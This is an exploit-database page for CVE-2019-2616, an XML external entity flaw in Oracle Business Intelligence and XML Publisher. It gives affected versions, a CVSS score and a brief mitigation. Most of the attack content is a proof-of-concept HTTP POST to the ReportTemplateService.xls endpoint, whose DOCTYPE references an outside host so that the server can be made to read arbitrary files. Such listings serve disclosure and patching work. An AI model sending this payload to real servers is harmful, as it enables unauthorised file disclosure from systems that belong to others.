header-logo
Suggest Exploit
vendor:
Oracle Business Intelligence and XML Publisher
by:
@vah_13
7.2
CVSS
HIGH
XXE
611
CWE
Product Name: Oracle Business Intelligence and XML Publisher
Affected Version From: 11.1.1.9.0
Affected Version To: 12.2.1.4.0
Patch Exists: YES
Related CWE: CVE-2019-2616
CPE: oracle:business_intelligence_enterprise_edition
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
2019

XXE in Oracle Business Intelligence and XML Publisher

An XXE vulnerability exists in Oracle Business Intelligence and XML Publisher, versions 11.1.1.9.0, 12.2.1.3.0, and 12.2.1.4.0. An attacker can send a specially crafted XML request to the ReportTemplateService.xls endpoint to exploit this vulnerability. This can allow an attacker to read arbitrary files on the server.

Mitigation:

Ensure that XML documents are not processed in a way that allows external entities to be loaded. Disable external entity references in XML documents.
Source

Exploit-DB raw data:

# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2616 (7.2/10)

PoC:

POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8

<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
">